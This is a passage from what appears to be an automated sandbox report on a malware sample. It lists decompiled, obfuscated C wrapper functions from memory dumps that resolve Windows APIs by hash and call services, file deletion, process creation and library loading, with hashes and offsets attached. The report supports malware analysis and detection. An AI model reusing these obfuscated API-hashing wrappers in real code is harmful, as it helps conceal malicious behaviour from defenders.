                                          • Instruction Fuzzy Hash: 04014876801208BBDB04EF95D846CDFBF79EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002D7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E002D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x002d7bf7
                                          0x002d7bf8
                                          0x002d7bfa
                                          0x002d7bfd
                                          0x002d7bff
                                          0x002d7c02
                                          0x002d7c06
                                          0x002d7c07
                                          0x002d7c0f
                                          0x002d7c1d
                                          0x002d7c25
                                          0x002d7c2d
                                          0x002d7c31
                                          0x002d7c38
                                          0x002d7c3f
                                          0x002d7c46
                                          0x002d7c4a
                                          0x002d7c5e
                                          0x002d7c67
                                          0x002d7c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 002D7C67
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 98b9ead3d77cd507f006e07941fd9aeac6c860a770375a293ecb7be6740ed866
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 0C014FB190120CFFEB09DF94C84A9DEBBB5EF44314F108199F40567250E6B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002CF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E002CF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002D07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x002cf662
                                          0x002cf663
                                          0x002cf665
                                          0x002cf668
                                          0x002cf66a
                                          0x002cf66d
                                          0x002cf670
                                          0x002cf673
                                          0x002cf677
                                          0x002cf678
                                          0x002cf67d
                                          0x002cf687
                                          0x002cf693
                                          0x002cf69a
                                          0x002cf6a1
                                          0x002cf6a5
                                          0x002cf6a9
                                          0x002cf6b0
                                          0x002cf6c9
                                          0x002cf6d8
                                          0x002cf6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 002CF6D8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: c9a7883a01ad5096fc959c29a9ef5f670f9845c0b542d419713b3e700c14c3f7
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 0C01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90466250D6B25E21DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002CB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E002CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E002C602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x002cb6f3
                                          0x002cb6f8
                                          0x002cb702
                                          0x002cb70b
                                          0x002cb712
                                          0x002cb719
                                          0x002cb720
                                          0x002cb727
                                          0x002cb72e
                                          0x002cb747
                                          0x002cb759
                                          0x002cb75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 002CB759
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 9b32fb81d0d8175117ce20a7d91db7207e3653248179239a21ca5cb686d466e1
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 28014FB595130CFBEF45DF94DD06E9E7BB5EF14704F108188FA09661A0D3B15E209B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002DAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E002DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x002daa3f
                                          0x002daa40
                                          0x002daa41
                                          0x002daa44
                                          0x002daa47
                                          0x002daa4b
                                          0x002daa4c
                                          0x002daa51
                                          0x002daa5b
                                          0x002daa64
                                          0x002daa68
                                          0x002daa6f
                                          0x002daa76
                                          0x002daa8d
                                          0x002daa90
                                          0x002daa9d
                                          0x002daaa8
                                          0x002daaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 002DAAA8
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 194b06c5647a5d1072d7e8c7bc8ce5f826f7c593c73fb7e5fd8c6c451a2ef93a
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 69F069B191020CFFDF08DF94DD4A99EBFB4EB40304F108188F805A6260D3B29F649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 002C5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E002C5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002C602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002D07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x002c5fb5
                                          0x002c5fb6
                                          0x002c5fb7
                                          0x002c5fbb
                                          0x002c5fbc
                                          0x002c5fc1
                                          0x002c5fcb
                                          0x002c5fd7
                                          0x002c5fde
                                          0x002c5fe5
                                          0x002c5ffc
                                          0x002c5fff
                                          0x002c6006
                                          0x002c600d
                                          0x002c601a
                                          0x002c6025
                                          0x002c602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 002C6025
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2101952282.00000000002C1000.00000020.00000001.sdmp, Offset: 002C0000, based on PE: true
                                          • Associated: 0000000C.00000002.2101936320.00000000002C0000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.2102015297.00000000002DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 06c572578a309482a68677b761cd3e400cab6d7170db5e6cfd4035d987ce0908
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: E5F04FB0C11208FFEB08DFA0E94689EBFB8EB40300F20819CE409A7260E7B15F159F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2800 Parent PID: 2352 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 00222959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0022602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x0022295f
                                          0x00222964
                                          0x00222967
                                          0x0022296a
                                          0x0022296d
                                          0x0022296e
                                          0x0022296f
                                          0x00222977
                                          0x00222985
                                          0x0022298a
                                          0x00222992
                                          0x0022299a
                                          0x002229a2
                                          0x002229a9
                                          0x002229b0
                                          0x002229b7
                                          0x002229bb
                                          0x002229cf
                                          0x002229dc
                                          0x002229e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0022602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x0022c6e1
                                          0x0022c6e6
                                          0x0022c6f0
                                          0x0022c6fc
                                          0x0022c703
                                          0x0022c706
                                          0x0022c70d
                                          0x0022c711
                                          0x0022c715
                                          0x0022c71c
                                          0x0022c723
                                          0x0022c72a
                                          0x0022c731
                                          0x0022c738
                                          0x0022c751
                                          0x0022c762
                                          0x0022c768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00221000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0022602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x00221006
                                          0x00221009
                                          0x0022100c
                                          0x00221011
                                          0x00221016
                                          0x0022101d
                                          0x00221026
                                          0x0022102d
                                          0x00221034
                                          0x0022103b
                                          0x00221047
                                          0x0022104f
                                          0x00221057
                                          0x0022105e
                                          0x00221065
                                          0x0022106c
                                          0x00221073
                                          0x00221077
                                          0x0022108b
                                          0x00221096
                                          0x0022109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00224859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00224859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002307A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x0022485e
                                          0x0022487a
                                          0x0022487d
                                          0x00224884
                                          0x0022488b
                                          0x00224892
                                          0x0022489d
                                          0x002248a0
                                          0x002248ad
                                          0x002248b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002248B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: 81f399a38b3290deff4e9d0da5b8e83badc44d24b0f9d8852c102545871cb71b
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 7AF017B0A15209FBDB04CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00234F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00234F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0022602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x00234f80
                                          0x00234f81
                                          0x00234f82
                                          0x00234f86
                                          0x00234f87
                                          0x00234f8c
                                          0x00234fa5
                                          0x00234fa8
                                          0x00234faf
                                          0x00234fb6
                                          0x00234fc7
                                          0x00234fca
                                          0x00234fd7
                                          0x00234fe2
                                          0x00234fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00234FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E0023976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0022602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002307A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x00239772
                                          0x00239773
                                          0x00239778
                                          0x0023977a
                                          0x0023977b
                                          0x0023977e
                                          0x0023977f
                                          0x00239782
                                          0x00239785
                                          0x00239788
                                          0x00239789
                                          0x0023978c
                                          0x0023978f
                                          0x00239790
                                          0x00239791
                                          0x00239794
                                          0x00239797
                                          0x0023979a
                                          0x0023979d
                                          0x002397a0
                                          0x002397a3
                                          0x002397a6
                                          0x002397a7
                                          0x002397a8
                                          0x002397ad
                                          0x002397b7
                                          0x002397c3
                                          0x002397ca
                                          0x002397d1
                                          0x002397d8
                                          0x002397df
                                          0x002397e3
                                          0x002397fc
                                          0x00239816
                                          0x0023981d

                                          APIs
                                          • CreateProcessW.KERNEL32(0022591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0022591A), ref: 00239816
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                          • Associated: 0000000D.00000002.2103160791.0000000000220000.00000004.00000001.sdmp Download File
                                          • Associated: 0000000D.00000002.2103241748.000000000023C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 9a7324920c6fa73872278b88570e0d2bf5650161ff1a26a3230580b4f81e3e9e
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 3B11B072911188BBDF1A9FD6DC0ACDF7F7AEF89750F108148FA1556120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0022602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x0022b569
                                          0x0022b56a
                                          0x0022b56d
                                          0x0022b572
                                          0x0022b574
                                          0x0022b577
                                          0x0022b57a
                                          0x0022b57d
                                          0x0022b580
                                          0x0022b583
                                          0x0022b586
                                          0x0022b587
                                          0x0022b58a
                                          0x0022b58d
                                          0x0022b590
                                          0x0022b593
                                          0x0022b594
                                          0x0022b595
                                          0x0022b59a
                                          0x0022b5a4
                                          0x0022b5b8
                                          0x0022b5c0
                                          0x0022b5c4
                                          0x0022b5cb
                                          0x0022b5d2
                                          0x0022b5d9
                                          0x0022b5e6
                                          0x0022b5fd
                                          0x0022b604

                                          APIs
                                          • CreateFileW.KERNELBASE(00230668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00230668,?,?,?,?), ref: 0022B5FD
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.2103170019.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
